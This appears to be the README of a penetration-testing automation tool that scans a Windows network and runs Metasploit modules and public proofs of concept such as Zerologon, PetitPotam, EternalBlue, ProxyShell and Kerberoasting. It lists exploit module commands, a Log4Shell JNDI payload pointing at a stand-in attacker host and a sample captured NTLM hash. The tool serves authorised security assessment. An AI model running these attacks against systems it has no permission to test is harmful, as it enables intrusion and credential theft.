Pentest automation

This penetration testing solution is engineered to provide a foundational assessment of your network infrastructure and devices (PCs) within that network. It delivers comprehensive insights into network topology and identifies device-specific attributes, critically assessing their susceptibility to a range of recognized cyberattacks. Results are meticulously documented in dual formats: JSON for seamless integration into automated analytical pipelines and a human-readable text format for clear, concise review by stakeholders.

Prerequisites:

• Git
• Pipenv
• Nmap
• Antivirus (e.g. Microsoft Defender) turned off
• No other running network responding services on machine executing this script
• Set DNS server to one which has a record of target domain
• Python 3.11.2 (it should work on any 3.10 or newer version)
• Linux/Mac

Windows [depreciated] only Prerequisites:

• Microsoft Visual C++ 14.0 or greater is required only on Windows
• Windows SDK for Desktop C++
• Only limited compatibility

Compatibility:

Script is compatible with Kali OS (Kali 2023.1) and it was developed and tested on network using IPv4 addresses.

Settings

• You can define known usernames separated by new line in users.txt file which should be stored in root directory of pentest folder. In case no file is provided, it will be used default one.

Functionality:

1. Discovers network:

• get information about host and network
  • MAC address
  • IP address
  • Network info:IP, Subnet Mask & prefix
  • Active directories IPs

2. CrackMapExec - Device Discovery

• Discovering all devices that have port 445 (SMB) opened
• Storing important information about each discovered device:
  • architecture
  • domain
  • ip
  • is_active_directory
  • mac
  • name
  • open_ports
  • operation_system
  • os_build
  • os_version
• Printing discovered information into console

3. DNS transfer

• Find all DNS servers associated with given domain
• Attempt to dump all DNS records on each nameserver server using dig/nslookup

4. CrackMapExec enumeration of permissions on all shares

Null session

• Checking if a Null Session is enabled on the network
  • it can be very useful on a Domain Controller to enumerate users, groups, password, policy, etc

Anonymous user

• Using a random username and password, you can check if the target accepts anonymous/guest logon

5. Username enumeration

• using Nmap script to enumerate common usernames in the domain
  • script: krb5-enum-users
  • usernames to enumerate: users.txt
    • specify usernames separated by new line (using Unix "\n")
      • Windows supports both "\n" and "\r\n" line endings in users.txt file but Linux based OS only "\n"
    • if no file is specified, the default one will be used
  • using port 88 (Kerberos Pre-Authentication)

6. Petitpotam vulnerability test

• Use PetitPotam to trigger NTLM authentication from the Domain Controller to the Listener and then relay those authentication credentials to a vulnerable target
• If attack is successful, password hash will be revealed
• Attack type: man-in-the-middle

5. Zerologon Scan

• Test vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers.
• CVE-2020-1472

6. Eternalblue

• Utilization of Metasploit to test ms17-010 vulnerability
• msf > use exploit/windows/smb/ms17_010_eternalblue # equivalent of manual execution for each discovered host
• Works only on Linux-based OS (Windows is not supported)
• Attack type: Buffer overflow and other bugs
  • The size is calculated in SrvOs2FeaListSizeToNt is calculated with mathematical error where a DWORD[4B] is casted into a WORD[2B]

6. SMB Group Policy Preference Saved Passwords Enumeration

• Utilization of Metasploit to test CVE-2014-1812 vulnerability
• Enumerates files from target domain controllers and connects to them via SMB
  • it looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES key
• msf > use auxiliary/scanner/smb/smb_enum_gpp # equivalent of manual execution for each discovered host
• Works only on Linux-based OS (Windows is not supported)

7. Apache Tomcat User Enumeration

• Utilization of Metasploit to test CVE-2009-0580 vulnerability
• Enumerates Apache Tomcat's usernames via malformed requests to j_security_check
  • Different response whether user exists or not
• msf > use auxiliary/scanner/http/tomcat_enum # equivalent of manual execution for each discovered host
• Works only on Linux-based OS (Windows is not supported)

8. Apache Tomcat User Enumeration

• Utilization of Metasploit to test CVE-1999-0502, CVE-2009-3548, CVE-2009-3843, CVE-2009-4188, CVE-2009-4189, CVE-2010-0557, CVE-2010-4094 vulnerabilities
• Attempts to log in to a Tomcat Application Manager instance using a specific predefined user/pass
• msf > use auxiliary/scanner/http/tomcat_mgr_login # equivalent of manual execution for each discovered host
• Works only on Linux-based OS (Windows is not supported)
• Attack Type: credential bruteforce or dictionary attacker specifically tailored for the Tomcat Application Manager

9. Java RMI Server Insecure Endpoint Code Execution Scanner

• Utilization of Metasploit to test CVE-2011-3556 vulnerability
• Detect Java RMI endpoints (Remote Method Invocation)
  • parsing a serialised Java object → load Java classes from attacker
• msf > use auxiliary/scanner/misc/java_rmi_server # equivalent of manual execution for each discovered host
• Works only on Linux-based OS (Windows is not supported)
• Attack type: remote code execution (RCE)

10. Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration

• Obtain a list of all logins from an SQL Server with any login
  • By using public function SUSER_SNAME(principal_id) - it returns login associated with that ID
• msf > use auxiliary/admin/mssql/mssql_enum_sql_logins # equivalent of manual execution for each discovered host
• Works only on linux based OS (Windows is not supported)

11. Pre-authentication SSRF (Server Side Request Forgery) on Microsoft Exchange Server

• Utilization of Metasploit to test CVE-2021-26855, CVE-2021-27065
• Scan for a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication and impersonating as the admin
  • by setting X-AnonResource-Backend malicious header and request to the static file in /ecp
• msf > use auxiliary/scanner/http/exchange_proxylogon # equivalent of manual execution for each discovered host
• Works only on linux based OS (Windows is not supported)
• Note: This is not a defensive test (every scan output that failed to be vulnerable is considered as safe)
• Attack type: Remote Code Execution

12. Impersonate an arbitrary user on Microsoft Exchange Server to write a file

• Utilization of Metasploit to test CVE-2021-31207, CVE-2021-34473, CVE-2021-34523
• Exploit a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication ( CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve the RCE (Remote Code Execution)
  • by leveraging the autodiscover/autodiscover.json with manipulated the URL path (proxying) -> allows arbitrary backend URL access as NT AUTHORITY\SYSTEM
  • Impersonate arbitrary user by setting X-Rps-CAT
• msf > use exploit/windows/http/exchange_proxyshell_rce # equivalent of manual execution for each discovered host
• Works only on linux based OS (Windows is not supported)
• Note: This test might have high false positive rate
• Attack type: Remote Code Execution

13. Log4Shell HTTP Scanner

• Utilization of Metasploit to test CVE-2021-44228, CVE-2021-45046
• Scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection e.g ${jndi:ldap://attacker.com/malicious_code}
  • Attacker manipulate logger in order to interpret malicious string
• msf > use auxiliary/scanner/http/log4shell_scanner # equivalent of manual execution for each discovered host
• Works only on linux based OS (Windows is not supported)
• Attack type: Remote code execution

14. Kerberoasting

• Utilization of 3rd party Python script to test CVE-2022-33679
• Abuse legitimate Kerberos Ticket to extract hashed password of a service account → crack the password
• reference: https://github.com/Bdenneu/CVE-2022-33679
• Works only on Linux-based OS (Windows is not supported)
• Attack type: Password hash cracking with rainbow tables

15. SMB Relay NTLMv1

• Utilization of Metasploit to test CVE-2008-4037 vulnerability
• Access service as another user, relay SMB authentication requests that host, use legitime response to gaining access to an authenticated SMB session
  • User A try to authenticate but man-in-the-middle capture this traffic and uses this opportunity to authenticate as a user A for arbitrary service, a received challenge will be redirected to user A as it was a legitimate challenge from originally requested service
• Captured hashes can be found in SMB_RELAY directory
• msf > use exploit/windows/smb/smb_relay # equivalent of manual execution for each discovered host
• Works only on Linux-based OS (Windows is not supported)
• Attack type: Man in the middle

16. SMB Ghost Detection

• Utilization of 3rd party Python script to test CVE-2020-0796
• Detects RCE SMBGhost vulnerability
  • Specifically crafted SMBv3 message that will cause integer overflow in Srv2DecompressData
• reference : https://github.com/Barriuso/SMBGhost_AutomateExploitation.git
• Works only on Linux-based OS (Windows is not supported)
• Attack type: Buffer overflow

17. Impacket get TGT Scan

• This is a completely remote attack without using a local system of the compromised victim, but you need to compromise NTLM hashes for that
  • hashes have to be stored in root directory as hashes.txt otherwise the test is skipped
    • one hash one line
    • format should be in Responder output, e.g.:

      admin::TEST-WINDOWS10:844c2456ce8046c5:77EFECBAD24A575920ABAB84AD665A56:010100000000000000C7CBCF2B91D9012EAEF0B073122729000000000200080036005A004900510001001E00570049004E002D004D005800330041004E004E005200300059003100380004003400570049004E002D004D005800330041004E004E00520030005900310038002E0036005A00490051002E004C004F00430041004C000300140036005A00490051002E004C004F00430041004C000500140036005A00490051002E004C004F00430041004C000700080000C7CBCF2B91D90106000400020000000800300030000000000000000100000000200000053E51DD80A57400AB5A0BDE4F3027A1F127E6022B89F5B23D0D5EC5167A39900A001000000000000000000000000000000000000900200063006900660073002F00670065006500770072006700770065006700720077000000000000000000
      

• Remotely request a Ticket Granting Ticket (TGT) from Kerberos Key Distribution Center using a pass-the-hash attack
• Scan will iterate through all hashes and all Active Directories
• reference: https://github.com/fortra/impacket
• Works only on Linux-based OS (Windows is not supported)
• Note: to generate ntlm hash you can use www.lambdatest.com/free-online-tools/ntlm-hash-generator

Execution:

1. $ git clone [email protected]:danyk20/pentest.git
2. $ cd pentest
3. $ pipenv install
4. $ pipenv run python main.py [sudo password]

Sudo password will be requested only on linux/macOS machines in case it was not given as an optional argument. On Windows you have to run it as an Administrator.

Configuration:

You can add specific active directories that you want to explicitly include into the test. In order to do so you have to add them into configuraiton.yaml as a list (each IP on the separate line starting with dash) and you need to fill 'domain_name' value as well.

example:

active_directories:
   - 192.168.0.111
   - 192.168.0.222
   - 192.168.0.100
   
domain_name: Target.local   

Results:

Runtime partial results and status logs:

During program execution is user allways informed about current state and progress. There are executed command, discovered information such as devices, usernames, etc...

Overall results:

Script outputs result of each test to standard output in following format:

Test: <test name> is [safe|vulnerable]

Duration X.XXs

For example Zerologon scan in test environment resulted in following output:

Test: Zerologon scan is safe

Duration: 34.05s

Export into file

network.json

• all collected data about network
• format:

  {
  "active_directories": [
    "XXX.XXX.XXX.XXX"
  ],
  "devices": [
    {
        "ip": "XXX.XXX.XXX.XXX",
        "name": "NAME",
        "operation_system": "OS",
        "os_version": "XX.X",
        "architecture": "Architecture",
        "domain": "Domain.Name",
        "os_build": "Number",
        "is_active_directory": boolean,
        "mac": "XX:XX:XX:XX:XX:XX"
    }
  ],
  "host_ip": "XXX.XXX.XXX.XXX/XX",
  "mac": "XX:XX:XX:XX:XX:XX",
  "net_ip":  "XXX.XXX.XXX.XXX/XX",
  "users": [
      "admin",
      "administrator"
  ]
  }
  

results.json

• information about performed tests
• detailed information about performed tests
• format per test:

  {
   "name": "test name",
   "finish_time": timestamp,
   "expected_output": "String",
   "start_time": timestamp,
   "return_val": "String",
   "is_safe": <boolean>,
   "details": "String",
  }
  

results.txt

• human-readable format
• only the most important data from the tests
• format per test:

  Test: TEST NAME is safe/vulnerable
  Duration: X.XXs

  ---

metasploit

• the directory contains one .txt file per each executed test using metasploit
  • this file named after the test
  • contains detail output from the test including all the setting
  • lines starting with '[+]' prefix might contain important information about vulnerability

Structure

attack

• contains several python scripts where each represents different penetration attack as described bellow
• these scripts are executed during the test

CrackMapExec.py

• smb
• smb null season
• smb anonymous

DNS_transfer.py

• dig
• nslookup

Kerberoasting.py

• CVE-2022-33679

Metasploit.py

• eternalblue
• ms17-010

PetitPotam.py

• PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions

Scanner.py

• Nmap

  • nmap -p389 -sV -oX - ip/prefix

  • nmap -p 88 --script krb5-enum-users --script-args realm=<domain> <ip>

Zerologon.py

• test and exploit unpatched Domain Controllers for the Zerologon Vulnerability
• CVE-2020-1472

CrackMapExec

• whole repository of CrackMapExec
• source: https://github.com/Porchetta-Industries/CrackMapExec
• version tag sha: d2ea13f6c3125cdcfb4791e4e51379c71dd9fd6d

model

• python classes to represent objects in the test

Device.py

• Class representing information about the particular device

Network.py

• Class representing information about tested network

TestCase.py

• Class representing information about the performed test

output

• storage of json and txt result from the test

network.json

• all collected information about the tested network

results.json

• all collected information about performed tests

results.txt

• human-readable basic information about performed tests

PetitPotam

• whole repository of PetitPotam tool
• source: https://github.com/topotam/PetitPotam
• version tag sha: d83ac8f2dd34654628c17490f99106eb128e7d1e

utils

• helper python script

Evaluation.py

• evaluation of the test run
• comparing expected and received result

Executor.py

• executing command in OS command line

Exporter.py

• exporting results into files

zerologon

• whole repository of zerologon vulnerability
• source: https://github.com/rth0pper/zerologon
• version tag sha: 952ee2eb0dbbaae89326f8e07fe8505408d70869

main.py

• entry point for whole penetration test

Pipfile

• configuration of the virtual environment containing all dependencies and their versions
• alternative to requirement.txt

README.md

• instructions and documentation
• this file

requirements.txt

• all dependencies and their version
• alternative to Pipfile